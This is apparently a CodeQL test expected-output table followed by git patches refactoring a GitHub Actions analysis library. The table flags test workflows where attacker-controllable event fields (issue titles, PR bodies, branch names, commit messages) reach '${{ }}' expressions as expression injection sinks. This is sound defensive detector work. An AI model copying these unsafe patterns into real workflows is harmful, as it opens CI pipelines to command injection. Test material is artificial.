Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | From 86075c95bd5293284dadc34f02d27c2f1c3801af Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 22:28:54 +0100 Subject: [PATCH 088/707] Improve ExpressionNode Location handling --- ql/lib/codeql/actions/Ast.qll | 20 +++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 9 ++++++--- 2 files changed, 18 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 21d4f052e130..1f4794ae9bc5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -68,21 +68,25 @@ class ExpressionNode extends AstNode, TExpressionNode { Job getJob() { result.getAChildNode*() = n } + /** + * Gets the length of each line in the StringValue . + */ int lineLength(int idx) { exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) } - bindingset[i] - int unboundPartialLineLengthSum(int i) { - result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) - } - + /** + * Gets the sum of the length of the lines up to the given index. + */ int partialLineLengthSum(int i) { i in [0 .. count(n.getValue().splitAt("\n"))] and - result = this.unboundPartialLineLengthSum(i) + result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) } - predicate expressionOffsets(int sl, int sc, int el, int ec) { + /** + * Gets the absolute coordinates of the expression. + */ + predicate expressionLocation(int sl, int sc, int el, int ec) { exists(int lineDiff, string style, Location loc | loc = n.asYamlNode().getLocation() and lineDiff = loc.getEndLine() - loc.getStartLine() and @@ -164,7 +168,7 @@ class ExpressionNode extends AstNode, TExpressionNode { predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionOffsets(sl, sc, el, ec) + this.expressionLocation(sl, sc, el, ec) } override File getFile() { result = n.asYamlNode().getFile() } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0972ae500398..8cd640ace096 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -274,10 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run { private class StringValueTree extends StandardPreOrderTree instanceof StringValue { override ControlFlowTree getChildNode(int i) { result = - rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | - child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + rank[i](ExpressionNode child, Location l | + child = super.getAChildNode() and + l = child.getLocation() | - child order by sl, sc, ec, el, child.toString() + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() ) } } From 9b97dbd870a8aa386082b21893e1d372e5ecf95b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 12 Mar 2024 10:16:43 +0100 Subject: [PATCH 089/707] Refactor ast nodes --- ql/lib/codeql/Locations.qll | 4 +- ql/lib/codeql/actions/Ast.qll | 907 ++------------- ql/lib/codeql/actions/ast/internal/Ast.qll | 1001 +++++++++++++++++ .../actions/controlflow/internal/Cfg.qll | 19 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 2 +- ql/lib/ext/actions_github-script.model.yml | 3 - ql/src/Debug/partial.ql | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 4 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 7 +- ql/test/library-tests/test.expected | 427 +++---- ql/test/library-tests/test.ql | 29 +- 15 files changed, 1287 insertions(+), 1128 deletions(-) create mode 100644 ql/lib/codeql/actions/ast/internal/Ast.qll diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 33a8eba30acb..96b5d45f18e0 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll @@ -1,7 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem -import codeql.actions.Ast +import codeql.actions.ast.internal.Ast bindingset[loc] pragma[inline_late] @@ -19,7 +19,7 @@ newtype TLocation = locations_default(_, file, startline, startcolumn, endline, endcolumn) ) or - exists(ExpressionNode e | + exists(ExpressionImpl e | e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) ) or diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1f4794ae9bc5..2bfedd623f5c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,933 +1,232 @@ -private import codeql.actions.ast.internal.Yaml +private import codeql.actions.ast.internal.Ast private import codeql.Locations -newtype TAstNode = - TWorflowNode(YamlNode n) or - TExpressionNode(StringValue n, string expression, int exprOffset) { - expression = getASimpleReferenceExpression(n, exprOffset) - } - -class AstNode extends TAstNode { - abstract AstNode getAChildNode(); +class AstNode instanceof AstNodeImpl { + AstNode getAChildNode() { result = super.getAChildNode() } - abstract AstNode getParentNode(); + AstNode getParentNode() { result = super.getParentNode() } - abstract string getAPrimaryQlClass(); + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } - abstract string toString(); + Location getLocation() { result = super.getLocation() } - abstract Location getLocation(); + string toString() { result = super.toString() } - abstract File getFile(); + Job getEnclosingJob() { result = super.getEnclosingJob() } - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - ExpressionNode getInScopeEnvVarExpr(string name) { - exists(StringValue l, Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and - l.getAnExpression() = result - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ExpressionNode extends AstNode, TExpressionNode { - StringValue n; - string rawExpression; +class ScalarValue extends AstNode instanceof ScalarValueImpl { } + +class Expression extends AstNode instanceof ExpressionImpl { string expression; - int exprOffset; + string rawExpression; - ExpressionNode() { - this = TExpressionNode(n, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + Expression() { + expression = this.getExpression() and + rawExpression = this.getRawExpression() } - override string toString() { result = expression } - - override AstNode getAChildNode() { none() } - - override AstNode getParentNode() { result = n } - - override string getAPrimaryQlClass() { result = "ExpressionNode" } - string getExpression() { result = expression } string getRawExpression() { result = rawExpression } - - Job getJob() { result.getAChildNode*() = n } - - /** - * Gets the length of each line in the StringValue . - */ - int lineLength(int idx) { - exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) - } - - /** - * Gets the sum of the length of the lines up to the given index. - */ - int partialLineLengthSum(int i) { - i in [0 .. count(n.getValue().splitAt("\n"))] and - result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) - } - - /** - * Gets the absolute coordinates of the expression. - */ - predicate expressionLocation(int sl, int sc, int el, int ec) { - exists(int lineDiff, string style, Location loc | - loc = n.asYamlNode().getLocation() and - lineDiff = loc.getEndLine() - loc.getStartLine() and - style = n.asYamlNode().(YamlString).getStyle() - | - // eg: - // - run: echo "hello" - // - run: 'echo "hello"' - // - run: "echo 'hello'" - style = ["", "\"", "'"] and - lineDiff = 0 and - sl = loc.getStartLine() and - el = sl and - sc = loc.getStartColumn() + exprOffset and - ec = sc + rawExpression.length() - 1 - or - // eg: - // - run: "echo 'hello' - // echo 'hello'" - // - run: "echo 'hello' - // echo 'hello' - // echo 'hello'" - style = ["", "\"", "'"] and - lineDiff 